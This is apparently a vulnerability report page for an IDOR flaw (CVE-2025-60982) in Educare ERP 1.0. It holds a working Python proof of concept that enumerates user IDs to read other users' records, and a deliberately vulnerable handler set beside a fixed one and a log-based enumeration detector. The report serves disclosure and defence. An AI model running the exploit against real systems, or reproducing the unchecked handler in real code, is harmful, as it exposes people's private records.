Security Vulnerability Report
CVE-2025-60982 CVSS 5.4 MEDIUM

CVE-2025-60982

Published: 2025-10-27 18:15:43
Last Modified: 2026-04-15 00:35:42

Description

IDOR vulnerability in Educare ERP 1.0 (2025-04-22) allows unauthorized access to sensitive data via manipulated object references. Affected endpoints do not enforce proper authorization checks, allowing authenticated users to access or modify data belonging to other users by changing object identifiers in API requests. Attackers can exploit this flaw to view or modify sensitive records without proper authorization.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Educare ERP 1.0 (2025-04-22)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-60982 IDOR PoC for Educare ERP 1.0
# Target: Educare ERP 1.0 (2025-04-22)
# Vulnerability: Insecure Direct Object Reference

TARGET_URL = "http://target-educare-erp.com"
LOGIN_ENDPOINT = "/api/auth/login"
VULNERABLE_ENDPOINT = "/api/users/{user_id}/records"


def login(username, password):
    """Authenticate and get session token"""
    session = requests.Session()
    login_data = {"username": username, "password": password}
    response = session.post(f"{TARGET_URL}{LOGIN_ENDPOINT}", json=login_data)
    if response.status_code == 200:
        return session, response.json().get("token")
    return None, None


def exploit_idor(session, token, target_user_id):
    """Exploit IDOR by manipulating object reference"""
    # Modify the user_id parameter to access other users' data
    headers = {"Authorization": f"Bearer {token}"}
    target_url = f"{TARGET_URL}{VULNERABLE_ENDPOINT.format(user_id=target_user_id)}"
    response = session.get(target_url, headers=headers)
    if response.status_code == 200:
        return response.json()
    return None


def main():
    # Step 1: Login with low-privilege account
    session, token = login("[email protected]", "password123")
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")

    # Step 2: Enumerate and access other users' data via IDOR
    for user_id in range(1, 100):
        print(f"[*] Attempting to access user ID: {user_id}")
        data = exploit_idor(session, token, user_id)
        if data:
            print(f"[+] Successfully accessed user {user_id} data:")
            print(json.dumps(data, indent=2))


if __name__ == "__main__":
    main()
```
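The description above says the affected endpoints authenticate the caller but never check that the caller is allowed to touch the object named in the URL, and the PoC shows what that looks like from the outside: one low-privilege session walking user IDs. The following is an added example, not Educare ERP code, that shows the same `/api/users/{user_id}/records` lookup in its IDOR-prone form beside a hardened form that authorizes against the caller's identity, plus a small log check that surfaces the enumeration pattern the PoC produces. The `Principal` type, the roles, the in-memory `RECORDS` store, the `handle_request` dispatcher and the log line format are all constructed for illustration.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Principal:
    """The authenticated caller, as established by the login step (constructed)."""
    user_id: int
    role: str  # constructed roles: "student" or "admin"


class AccessDenied(Exception):
    """Raised for both 'not yours' and 'does not exist' so the response does
    not reveal which user IDs hold records."""


# Constructed sample store: records keyed by the owning user's ID.
RECORDS = {
    1: {"name": "Student One", "grades": {"math": "A"}},
    2: {"name": "Student Two", "grades": {"math": "C"}},
}


def get_records_vulnerable(caller: Principal, user_id: int) -> dict:
    """IDOR-prone handler: it trusts the user_id taken from the URL.
    The caller is authenticated, but nothing ties user_id to the caller."""
    if user_id not in RECORDS:
        raise AccessDenied(user_id)
    return RECORDS[user_id]


def is_authorized(caller: Principal, user_id: int) -> bool:
    """Object-level authorization: the owner or an admin, nobody else."""
    return caller.role == "admin" or caller.user_id == user_id


def get_records_fixed(caller: Principal, user_id: int) -> dict:
    """Hardened handler: decide on the caller's identity, not on the
    client-supplied identifier, before any object lookup. A foreign record
    and a missing record produce the same outcome."""
    if not is_authorized(caller, user_id) or user_id not in RECORDS:
        raise AccessDenied(user_id)
    return RECORDS[user_id]


def handle_request(handler, caller: Principal, user_id: int):
    """Tiny constructed dispatcher mapping the handler's outcome to an HTTP status."""
    try:
        return 200, handler(caller, user_id)
    except AccessDenied:
        return 404, {"error": "not found"}


# Detection side: the PoC walks user IDs 1..99 from a single session. Counting
# distinct object IDs per session over a window exposes that in access logs.
# Constructed log lines in a simple space-separated shape (not Educare's format).
SAMPLE_LOG = """\
10.0.0.5 sess=abc GET /api/users/1/records 200
10.0.0.5 sess=abc GET /api/users/2/records 200
10.0.0.5 sess=abc GET /api/users/3/records 200
10.0.0.5 sess=abc GET /api/users/4/records 200
10.0.0.9 sess=xyz GET /api/users/2/records 200
"""

LOG_RE = re.compile(r"sess=(\S+) GET /api/users/(\d+)/records (\d{3})")


def distinct_ids_per_session(log_text: str) -> dict:
    """Count distinct user_id values each session successfully read."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m.group(3) == "200":
            seen[m.group(1)].add(int(m.group(2)))
    return {sess: len(ids) for sess, ids in seen.items()}


def flag_enumeration(log_text: str, threshold: int = 3) -> list:
    """Sessions that read at least `threshold` distinct users' records."""
    counts = distinct_ids_per_session(log_text)
    return sorted(sess for sess, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    student = Principal(user_id=1, role="student")
    print(handle_request(get_records_vulnerable, student, 2))  # leaks user 2
    print(handle_request(get_records_fixed, student, 2))       # 404
    print(flag_enumeration(SAMPLE_LOG))                        # ['abc']
```

The fix is the single `is_authorized` call placed before the lookup; everything else in the handler is unchanged. Returning the same 404 for a foreign record and for a nonexistent one keeps the response from doubling as an existence oracle, which matters because the PoC relies on status codes to tell which IDs are live. The threshold in `flag_enumeration` is a constructed value; a real deployment would tune it to how many records a legitimate user reads per window.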

References

https://github.com/handyteddy/Security-Advisories/blob/main/Educare-IDOR.md
https://www.educare.school/

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-60982", "sourceIdentifier": "[email protected]", "published": "2025-10-27T18:15:43.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IDOR vulnerability in Educare ERP 1.0 (2025-04-22) allows unauthorized access to sensitive data via manipulated object references. Affected endpoints do not enforce proper authorization checks, allowing authenticated users to access or modify data belonging to other users by changing object identifiers in API requests. Attackers can exploit this flaw to view or modify sensitive records without proper authorization."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/handyteddy/Security-Advisories/blob/main/Educare-IDOR.md", "source": "[email protected]"}, {"url": "https://www.educare.school/", "source": "[email protected]"}, {"url": "https://github.com/handyteddy/Security-Advisories/blob/main/Educare-IDOR.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```